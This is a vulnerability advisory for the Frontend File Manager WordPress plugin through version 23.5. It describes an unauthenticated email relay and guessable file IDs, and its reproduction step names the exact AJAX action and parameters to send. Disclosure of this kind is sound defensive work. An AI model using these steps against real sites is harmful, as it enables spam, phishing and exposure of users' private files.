Frontend File Manager WordPress Plugin Unauthenticated Email Relay Vulnerability

A vulnerability in the Frontend File Manager WordPress plugin, affecting versions through 23.5, allows unauthenticated users to send emails via the site without any security checks. This flaw can be exploited to use the WordPress site as an open relay for spam or phishing emails. Additionally, attackers can guess file IDs to access and share uploaded files without permission, potentially exposing sensitive information.

Impact

Exploitation of this vulnerability could lead to unauthorized email sending, allowing for spam or phishing attacks. Furthermore, it could result in unauthorized access to shared files, exposing sensitive information.

Reproduction

To reproduce this vulnerability, send a POST request to 'wp-admin/admin-ajax.php' with the action 'wpfm_send_file_in_email', along with the file ID, email address, and a message. The expected response is a success message indicating that the file has been shared successfully.